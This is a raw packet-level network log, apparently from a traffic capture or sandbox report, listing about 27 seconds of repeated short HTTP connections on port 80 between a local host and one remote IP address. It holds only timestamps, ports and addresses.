Sep 25, 2024 15:29:57.741466999 CEST	80	55962	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:58.146569967 CEST	55963	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:58.154551983 CEST	80	55963	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:58.154656887 CEST	55963	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:58.156909943 CEST	55963	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:58.164894104 CEST	80	55963	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:58.164944887 CEST	55963	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:58.172955990 CEST	80	55963	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:58.842067957 CEST	80	55963	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:58.842379093 CEST	80	55963	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:58.842437029 CEST	55963	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:58.842485905 CEST	55963	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:58.847290039 CEST	80	55963	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:58.975866079 CEST	55964	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:58.980962038 CEST	80	55964	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:58.981086016 CEST	55964	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:58.983046055 CEST	55964	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:58.987847090 CEST	80	55964	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:58.987926960 CEST	55964	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:58.992954969 CEST	80	55964	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:59.669751883 CEST	80	55964	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:59.669969082 CEST	55964	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:59.671691895 CEST	80	55964	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:59.671768904 CEST	55964	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:59.674829006 CEST	80	55964	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:59.823797941 CEST	55965	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:59.828731060 CEST	80	55965	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:59.828810930 CEST	55965	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:59.830913067 CEST	55965	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:59.835778952 CEST	80	55965	188.114.96.3	192.168.2.4
Sep 25, 2024 15:29:59.835834980 CEST	55965	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:29:59.840722084 CEST	80	55965	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:00.558449030 CEST	80	55965	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:00.558633089 CEST	55965	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:00.558897018 CEST	80	55965	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:00.558938980 CEST	55965	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:00.564280033 CEST	80	55965	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:00.701694012 CEST	55966	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:00.706685066 CEST	80	55966	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:00.706866980 CEST	55966	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:00.711074114 CEST	55966	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:00.715938091 CEST	80	55966	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:00.716017962 CEST	55966	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:00.721501112 CEST	80	55966	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:01.627257109 CEST	80	55966	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:01.627418041 CEST	55966	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:01.627676964 CEST	80	55966	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:01.627752066 CEST	55966	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:01.632246017 CEST	80	55966	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:01.775707006 CEST	55967	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:01.913722038 CEST	80	55967	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:01.913819075 CEST	55967	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:01.915862083 CEST	55967	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:01.920701027 CEST	80	55967	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:01.920768023 CEST	55967	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:01.925667048 CEST	80	55967	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:02.596066952 CEST	80	55967	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:02.596189022 CEST	55967	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:02.596564054 CEST	80	55967	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:02.596606970 CEST	55967	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:02.601053953 CEST	80	55967	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:02.746201038 CEST	55968	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:02.752753973 CEST	80	55968	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:02.752851009 CEST	55968	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:02.754868031 CEST	55968	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:02.761226892 CEST	80	55968	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:02.761282921 CEST	55968	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:02.766079903 CEST	80	55968	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:03.523556948 CEST	80	55968	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:03.523662090 CEST	55968	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:03.523982048 CEST	80	55968	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:03.524028063 CEST	55968	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:03.528471947 CEST	80	55968	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:03.864386082 CEST	55969	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:03.869379997 CEST	80	55969	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:03.869481087 CEST	55969	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:03.941581011 CEST	55969	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:03.946427107 CEST	80	55969	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:03.946516037 CEST	55969	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:03.951317072 CEST	80	55969	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:05.068569899 CEST	80	55969	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:05.068828106 CEST	55969	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:05.069282055 CEST	80	55969	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:05.069371939 CEST	55969	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:05.073628902 CEST	80	55969	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:05.210833073 CEST	55970	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:05.218031883 CEST	80	55970	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:05.218113899 CEST	55970	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:05.220174074 CEST	55970	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:05.226355076 CEST	80	55970	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:05.226429939 CEST	55970	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:05.233550072 CEST	80	55970	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:06.054195881 CEST	80	55970	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:06.054434061 CEST	55970	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:06.056499004 CEST	80	55970	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:06.056555033 CEST	55970	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:06.059293032 CEST	80	55970	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:06.201776981 CEST	55971	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:06.433116913 CEST	80	55971	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:06.433270931 CEST	55971	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:06.435375929 CEST	55971	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:06.440186977 CEST	80	55971	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:06.440248966 CEST	55971	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:06.445102930 CEST	80	55971	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:07.461065054 CEST	80	55971	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:07.461082935 CEST	80	55971	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:07.461090088 CEST	80	55971	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:07.461170912 CEST	80	55971	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:07.461246967 CEST	55971	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:07.461246967 CEST	55971	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:07.461247921 CEST	55971	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:07.461247921 CEST	55971	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:07.466088057 CEST	80	55971	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:07.602101088 CEST	55972	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:07.607044935 CEST	80	55972	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:07.607125044 CEST	55972	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:07.608885050 CEST	55972	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:07.613642931 CEST	80	55972	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:07.613698006 CEST	55972	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:07.618702888 CEST	80	55972	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:08.369697094 CEST	80	55972	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:08.370199919 CEST	80	55972	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:08.370282888 CEST	55972	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:08.373850107 CEST	55972	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:08.379045010 CEST	80	55972	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:08.508213997 CEST	55973	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:08.513225079 CEST	80	55973	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:08.513335943 CEST	55973	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:08.515196085 CEST	55973	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:08.520134926 CEST	80	55973	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:08.520224094 CEST	55973	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:08.525161982 CEST	80	55973	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:09.181221962 CEST	80	55973	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:09.181371927 CEST	55973	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:09.181853056 CEST	80	55973	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:09.181921959 CEST	55973	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:09.189851999 CEST	80	55973	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:09.323792934 CEST	55974	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:09.330323935 CEST	80	55974	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:09.330414057 CEST	55974	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:09.332556009 CEST	55974	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:09.339314938 CEST	80	55974	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:09.339417934 CEST	55974	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:09.345881939 CEST	80	55974	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:10.051428080 CEST	80	55974	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:10.051609039 CEST	55974	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:10.051678896 CEST	80	55974	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:10.051755905 CEST	55974	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:10.056504011 CEST	80	55974	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:10.208034039 CEST	55975	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:10.212961912 CEST	80	55975	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:10.213043928 CEST	55975	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:10.215982914 CEST	55975	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:10.220859051 CEST	80	55975	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:10.220925093 CEST	55975	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:10.226315975 CEST	80	55975	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:10.861635923 CEST	80	55975	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:10.861804008 CEST	55975	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:10.862324953 CEST	80	55975	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:10.862375021 CEST	55975	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:10.866580009 CEST	80	55975	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:11.012744904 CEST	55976	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:11.017745018 CEST	80	55976	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:11.017930984 CEST	55976	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:11.020920038 CEST	55976	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:11.025988102 CEST	80	55976	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:11.026164055 CEST	55976	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:11.031032085 CEST	80	55976	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:12.048547983 CEST	80	55976	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:12.048794031 CEST	55976	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:12.050790071 CEST	80	55976	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:12.050899029 CEST	55976	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:12.057825089 CEST	80	55976	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:12.204458952 CEST	55977	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:12.209537983 CEST	80	55977	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:12.209623098 CEST	55977	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:12.213246107 CEST	55977	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:12.218105078 CEST	80	55977	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:12.218161106 CEST	55977	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:12.222979069 CEST	80	55977	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:12.921641111 CEST	80	55977	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:12.921662092 CEST	80	55977	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:12.921665907 CEST	80	55977	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:12.921894073 CEST	55977	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:12.924000025 CEST	55977	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:12.928806067 CEST	80	55977	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:13.153594017 CEST	55978	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:13.161761045 CEST	80	55978	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:13.161860943 CEST	55978	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:13.167393923 CEST	55978	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:13.173727036 CEST	80	55978	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:13.173782110 CEST	55978	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:13.179995060 CEST	80	55978	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:13.838912010 CEST	80	55978	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:13.839050055 CEST	55978	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:13.839246035 CEST	80	55978	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:13.839293003 CEST	55978	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:13.843863010 CEST	80	55978	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:13.980905056 CEST	55979	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:13.985996962 CEST	80	55979	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:13.986187935 CEST	55979	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:13.988409042 CEST	55979	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:13.993266106 CEST	80	55979	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:13.993422985 CEST	55979	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:13.998311996 CEST	80	55979	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:14.665118933 CEST	80	55979	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:14.665373087 CEST	55979	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:14.665400982 CEST	80	55979	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:14.665448904 CEST	55979	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:14.670222998 CEST	80	55979	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:14.825773001 CEST	55980	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:14.830910921 CEST	80	55980	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:14.831100941 CEST	55980	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:14.834512949 CEST	55980	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:14.842472076 CEST	80	55980	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:14.842546940 CEST	55980	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:14.847471952 CEST	80	55980	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:15.525509119 CEST	80	55980	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:15.525572062 CEST	80	55980	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:15.525636911 CEST	55980	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:15.527673006 CEST	55980	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:15.531017065 CEST	80	55980	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:15.532588959 CEST	80	55980	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:15.532668114 CEST	55980	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:15.678278923 CEST	55981	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:15.683224916 CEST	80	55981	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:15.683306932 CEST	55981	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:15.686281919 CEST	55981	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:15.691152096 CEST	80	55981	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:15.691270113 CEST	55981	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:15.696103096 CEST	80	55981	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:16.351320982 CEST	80	55981	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:16.351399899 CEST	80	55981	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:16.351548910 CEST	55981	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:16.352452993 CEST	55981	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:16.357320070 CEST	80	55981	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:16.537952900 CEST	55982	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:16.543148994 CEST	80	55982	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:16.543256998 CEST	55982	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:16.545212030 CEST	55982	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:16.551738977 CEST	80	55982	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:16.551798105 CEST	55982	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:16.558212042 CEST	80	55982	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:17.329895020 CEST	80	55982	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:17.330143929 CEST	55982	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:17.330900908 CEST	80	55982	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:17.331113100 CEST	55982	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:17.335068941 CEST	80	55982	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:17.484476089 CEST	55983	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:17.489536047 CEST	80	55983	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:17.489618063 CEST	55983	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:17.492960930 CEST	55983	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:17.497807980 CEST	80	55983	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:17.497859955 CEST	55983	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:17.502636909 CEST	80	55983	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:18.191195965 CEST	80	55983	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:18.191484928 CEST	55983	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:18.191988945 CEST	80	55983	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:18.192085981 CEST	55983	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:18.196346045 CEST	80	55983	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:18.351236105 CEST	55984	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:18.356179953 CEST	80	55984	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:18.356296062 CEST	55984	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:18.358325958 CEST	55984	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:18.363125086 CEST	80	55984	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:18.363198042 CEST	55984	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:18.368141890 CEST	80	55984	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:19.039804935 CEST	80	55984	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:19.039901972 CEST	55984	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:19.039963961 CEST	80	55984	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:19.040005922 CEST	55984	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:19.044869900 CEST	80	55984	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:19.187561035 CEST	55985	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:19.192501068 CEST	80	55985	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:19.192579985 CEST	55985	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:19.194960117 CEST	55985	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:19.199775934 CEST	80	55985	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:19.199856043 CEST	55985	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:19.204660892 CEST	80	55985	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:19.925561905 CEST	80	55985	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:19.925617933 CEST	80	55985	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:19.925797939 CEST	55985	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:19.925797939 CEST	55985	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:19.932506084 CEST	80	55985	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:20.079291105 CEST	55986	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:20.084664106 CEST	80	55986	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:20.087739944 CEST	55986	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:20.089766979 CEST	55986	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:20.094580889 CEST	80	55986	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:20.095707893 CEST	55986	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:20.100594997 CEST	80	55986	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:21.354742050 CEST	80	55986	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:21.354770899 CEST	80	55986	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:21.354784012 CEST	80	55986	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:21.354896069 CEST	80	55986	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:21.355001926 CEST	55986	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:21.355001926 CEST	55986	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:21.355001926 CEST	55986	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:21.361414909 CEST	80	55986	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:21.493887901 CEST	55987	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:21.498930931 CEST	80	55987	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:21.499090910 CEST	55987	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:21.502037048 CEST	55987	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:21.506910086 CEST	80	55987	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:21.507010937 CEST	55987	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:21.511852026 CEST	80	55987	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:22.975692987 CEST	80	55987	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:22.975730896 CEST	80	55987	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:22.975749016 CEST	80	55987	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:22.975845098 CEST	55987	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:22.975958109 CEST	55987	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:22.975959063 CEST	55987	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:22.977467060 CEST	80	55987	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:22.977538109 CEST	55987	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:22.977809906 CEST	80	55987	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:22.977869034 CEST	55987	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:22.980750084 CEST	80	55987	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:23.121572971 CEST	55988	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:23.126583099 CEST	80	55988	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:23.126693964 CEST	55988	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:23.129600048 CEST	55988	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:23.134391069 CEST	80	55988	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:23.134473085 CEST	55988	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:23.139282942 CEST	80	55988	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:24.171243906 CEST	80	55988	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:24.171304941 CEST	80	55988	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:24.171319008 CEST	80	55988	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:24.171451092 CEST	55988	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:24.171684980 CEST	55988	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:24.171684980 CEST	55988	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:24.173330069 CEST	80	55988	188.114.96.3	192.168.2.4
Sep 25, 2024 15:30:24.173403978 CEST	55988	80	192.168.2.4	188.114.96.3
Sep 25, 2024 15:30:24.176420927 CEST	80	55988	188.114.96.3	192.168.2.4
